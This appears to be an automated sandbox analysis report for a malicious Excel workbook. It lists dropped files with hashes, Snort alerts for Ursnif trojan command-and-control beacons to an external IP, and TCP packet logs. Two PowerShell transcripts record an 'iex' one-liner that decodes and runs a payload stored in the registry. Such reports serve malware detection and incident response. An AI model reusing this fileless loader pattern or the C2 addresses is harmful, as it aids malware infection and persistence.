SHA-256:	938D4A4803DFA1AFA749995371F82B33F8F4F29E35F4286813A58519EF4EC730
SHA-512:	5BA4841262E939567C13AAD0B23D34A9B2901588CAC01ABC00C06749D9195CB1D23E3D262F2A8896BCBFCEE645DB305260EBEC372CBEAD4F0E9B01D626C71BEE
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF6208F46269C5D052.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40161
Entropy (8bit):	0.6748703445699284
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+Z3lUXW59Fut1a59Fut1B59Fut1y:kBqoxKAuqR+Z3lUXW5W65Wh5WS
MD5:	E487AA3B836E17916B59CC267C42DB1B
SHA1:	C86717A0951ED79ADA5963B14400FD8ECA765143
SHA-256:	B023CE9CD16C9C77AEF77219946915B75DB61F6DF56E91AF62186E4991F26201
SHA-512:	2A4536492153EE64E21B624BF8FB05FEF7C8C669B29541F4F90DAC204C8C1D68DBF0C4C8CA6D77940739ACF539A24A5B9EEB436623655D97AD0975CCB562B0BD
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF903C43FA17F64456.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40217
Entropy (8bit):	0.6824868847646752
Encrypted:	false
SSDEEP:	384:kBqoxKAuqR+1bZILmn2AHnNbtjn2AHnNbt8n2AHnNbt5:d1HnN91HnNU1HnN3
MD5:	55ED7624FEBCB3D4D10CFBB1FD665939
SHA1:	83B6054B5096FD7EBABEEA53BE00C1B710676C66
SHA-256:	60E9AEFBC296C12DA1CACF8C5B7B384BA22AEF36046A29931F558413B39993BC
SHA-512:	C76288BD25AE9A3A286A0ACF71A821E0602381D0DEEE22371254E60F0589FC3A59D8DD2FD43070F130A302A7470A840E87CAECC5379C0E5BCBA0138E521A33E2
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF97CC7EC2853BA6EC.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12933
Entropy (8bit):	0.4122061728840318
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loNrF9loNR9lWNsrFsr5:kBqoIN6NENcFc5
MD5:	87C19B0AB66776EC233AF2A84EC29542
SHA1:	3AD7C158FDD12B3FCAC40EC1CFAB167397E10BA0
SHA-256:	98BDB4F5B241F3CBF9E9E8FAFFFAE23365AFDB548E9C63DCA54F668FB45A6811
SHA-512:	93FDEEB6A231F5BD105B18B33B564256DAD879096F0495F15A1914F1D2FEB68010779D3C53C329DE8E78D7277754ED3DB46CCA876ACA6EFD7513803F7519C648
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF99BD870E81A4914B.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40169
Entropy (8bit):	0.6727491699490233
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+NTRwzGepzz6wepzz6Lepzz6M:kBqoxKAuqR+NTRwzGOHOwO9
MD5:	926AA50F9B11397E3CB026AFA8F59655
SHA1:	07358B1366A7A90477254B9B073E3D19C7959E6E
SHA-256:	B9C313F4D5CCD3AB8DCB6373C9B65DAC432A8A7A557A31F0A5005A0B5ADFC7EB
SHA-512:	534EA55B6C42AB0A5809BFB8E0528645CD3F2295BB075678036D113D6369A0DB04E165ED3A97B9635D94C741EBDD7E2EE3EBD36981B044E3526A76D742D69948
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFA7B5BF1FB774EA36.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40185
Entropy (8bit):	0.6770652307487162
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+2wqDwpiUmCIiJviUmCIiJgiUmCIiJd:kBqoxKAuqR+2wqDwp3OiV3OiO3OiT
MD5:	086E54865041FD1E00156F954E240361
SHA1:	4A39E548815BDFAF58CBC642C295FF436C5152F2
SHA-256:	524B452798FFB015874E19A35433B693FB1AA36C11B4871A4AD25CBD320C01DF
SHA-512:	CA07CEB170C43046BC4E924E58F7416C9A3DF762ACDCC3CDEC3BCFF9BBBA50F05992D41321DC578F37CDC9FB742D9E0D531CDBD6B27A751A9E0D8B8279C39BB4
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$documentation_39236.xlsb Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.6081032063576088
Encrypted:	false
SSDEEP:	3:RFXI6dtBhFXI6dtt:RJZhJ1
MD5:	836727206447D2C6B98C973E058460C9
SHA1:	D83351CF6DE78FEDE0142DE5434F9217C4F285D2
SHA-256:	D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
SHA-512:	7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
Malicious:	false
Preview:	.pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\Documents\20210708\PowerShell_transcript.632922.jVqfQyN1.20210708154748.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	976
Entropy (8bit):	5.493748444770493
Encrypted:	false
SSDEEP:	24:BxSAIxvBnkx2DOXUWOLCHGIYBtBCWnHjeTKKjX4CIym1ZJXgPOLCHGIYBtBW:BZcvhkoORFeVnqDYB1Z2pFeW
MD5:	D3EB7CE30813D194C9F4EA29241E921B
SHA1:	09ED495F6254C8953B08B5B87C0FDCF74ED0E5BD
SHA-256:	3EBEBB577CB48D71A54F92CD0AE010EA1A6FFB63E1CF7EC709C082F8CAC3BD18
SHA-512:	9986FE5500C18B9C1419EF4DAB022B54841210C36C2200EA0C5A1FCDB52B039D9C8FB569986B524337937125E055B8C870A3884D5011E79120A211DBC4100B94
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210708154749..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 632922 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..Process ID: 5196..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210708154749..********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..

C:\Users\user\Documents\20210708\PowerShell_transcript.632922.yKWYpH3L.20210708154747.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	976
Entropy (8bit):	5.493694549039648
Encrypted:	false
SSDEEP:	24:BxSAHxvBnkx2DOXUWOLCHGIYBtBCWnHjeTKKjX4CIym1ZJXlfOLCHGIYBtBW:BZRvhkoORFeVnqDYB1ZFFeW
MD5:	612AD7F724C061422CF854B63D07DF41
SHA1:	9161E0269B69126C661C4E17A976C48422F04F71
SHA-256:	60BAE5142EF45D769D43A72D3BC5E898389D215B79706141ED01ED8F218CD4F2
SHA-512:	034CDEB81071B59FEBAC13D2438DA3CDE4D6B0C112825704A72DFDF43F0F77E97E3C73FEE790FD3762A4D60A49DCBCB734BBBD4AA62C8ABE7A1042226D119A96
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210708154748..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 632922 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..Process ID: 3936..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210708154748..********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..

Static File Info

General
File type:	Zip archive data, at least v2.0 to extract
Entropy (8bit):	7.959986621336663
TrID:	Excel Microsoft Office Binary workbook document (47504/1) 49.73% Excel Microsoft Office Open XML Format document (40004/1) 41.88% ZIP compressed archive (8000/1) 8.38% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
File name:	documentation_39236.xlsb
File size:	213949
MD5:	31ed7b3f7d7173afe801858e30c0fb62
SHA1:	40376b923682dc858806071f97cb64f781142dbb
SHA256:	8081a3a7be80c197b850d2c1e3cac75944d3fb55fda2b312815f565616366843
SHA512:	0384ab9e41873f5a3e669f4483f7325c66b2978d47bc1285b30a0e26dd34e748fd2f96539781299b159ae402a0d503ccd44ac5f091fc073d5e476c20483968f4
SSDEEP:	3072:GPLcNfKSwCj4DzTB4uN5+8eV6hwIVFvnQCa5wrNvNppmWDzVXImozZHMXe+8ftJ8:dd73uNs7DIrPZPNflV+sOdftJ6Twg5
File Content Preview:	PK...........R................docProps/PK..........!.S-..............docProps/app.xml.SMO.1..W...\|'.....1....""...zg...{..VI.}'K.,.'.........X-+.@B..X.{...\.}X...\|rr......b..\........XC".(.".X.D.H)t%,-....R....aZ.X...Ut.K..N..L.. ....;B..8j...yt.}.4_..g..

File Icon


Icon Hash:	74f0d0d2c6d6d0f4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/08/21-15:46:47.694398	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49755	80	192.168.2.3	165.232.183.49
07/08/21-15:46:47.694398	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49755	80	192.168.2.3	165.232.183.49
07/08/21-15:46:50.491586	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.3	8.8.8.8
07/08/21-15:47:30.909945	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49757	80	192.168.2.3	165.232.183.49
07/08/21-15:47:30.909945	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49757	80	192.168.2.3	165.232.183.49
07/08/21-15:47:32.851699	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49759	80	192.168.2.3	165.232.183.49
07/08/21-15:47:35.972897	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49760	80	192.168.2.3	165.232.183.49
07/08/21-15:47:35.972897	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49760	80	192.168.2.3	165.232.183.49
07/08/21-15:47:37.855365	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49762	80	192.168.2.3	165.232.183.49
07/08/21-15:47:37.855365	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49762	80	192.168.2.3	165.232.183.49
07/08/21-15:47:39.574058	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49761	80	192.168.2.3	165.232.183.49
07/08/21-15:47:39.574058	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49761	80	192.168.2.3	165.232.183.49

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 8, 2021 15:45:12.662849903 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:12.796746016 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:12.796924114 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:12.798399925 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:12.931030035 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:12.933978081 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:12.934030056 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:12.934077978 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:12.934096098 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:12.934109926 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:12.934134960 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:12.934225082 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:12.935718060 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:12.935817957 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:12.967597961 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.104223013 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.104317904 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.105153084 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.248893976 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.248975039 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.249032974 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.249080896 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.249090910 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.249119997 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.249125957 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.249151945 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.249181986 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.249206066 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.249224901 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.249247074 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.249274015 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.249296904 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.249305010 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.249346018 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.249361992 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.249403000 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.249406099 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.249463081 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.381817102 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.381958961 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.382622957 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.382745981 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.383043051 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.383093119 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.383142948 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.383161068 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.383173943 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.383199930 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.383220911 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.383240938 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.383263111 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.383294106 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.383301973 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.383328915 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.383347034 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.383368969 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.383388996 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.383404970 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.383415937 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.383440018 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.383459091 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.383476019 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.383490086 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.383513927 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.383539915 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.383548975 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.383583069 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.383585930 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.383610010 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.383621931 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.383662939 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.383665085 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.383702993 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.383706093 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.383730888 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.383770943 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.383928061 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.384028912 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.514496088 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.514534950 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.514592886 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.514632940 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.514863014 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.514988899 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.515006065 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.515089035 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.515753984 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.515853882 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.515855074 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.515999079 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.516002893 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.516033888 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.516074896 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.516103029 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.516110897 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.516134977 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.516168118 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.516169071 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.516194105 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.516230106 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.516252995 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.516324997 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.516351938 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.516417980 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.516736031 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.516762972 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.516786098 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.516868114 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.516933918 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.517052889 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.517121077 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.517540932 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.517596006 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.517627001 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.517664909 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.517676115 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.517704010 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.517724037 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.517729044 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.517755985 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.517780066 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.517782927 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.517816067 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.517846107 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.517857075 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.517872095 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.517899036 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.517901897 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.517925978 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.517935991 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.517954111 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.517981052 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.517982960 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.518007994 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.518042088 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.518053055 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.518074036 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.518085003 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.518100023 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.518129110 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.518130064 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.518156052 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.518163919 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.518234015 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.646828890 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.646859884 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.646878958 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.646991014 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.647032976 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.647660017 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.647782087 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.648307085 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.648354053 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.648401022 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.648437977 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.649261951 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.649281979 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.649307966 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.649322987 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.649338961 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.649380922 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.649399996 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.649410009 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.649432898 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.649447918 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.649466038 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.649475098 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.649502039 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.649503946 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.649518967 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.649550915 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.649554014 CEST	49725	443	192.168.2.3	162.241.253.78
Jul 8, 2021 15:45:13.649564028 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.649580002 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.649591923 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.649610996 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.649626970 CEST	443	49725	162.241.253.78	192.168.2.3
Jul 8, 2021 15:45:13.649636984 CEST	443	49725	162.241.253.78	192.168.2.3
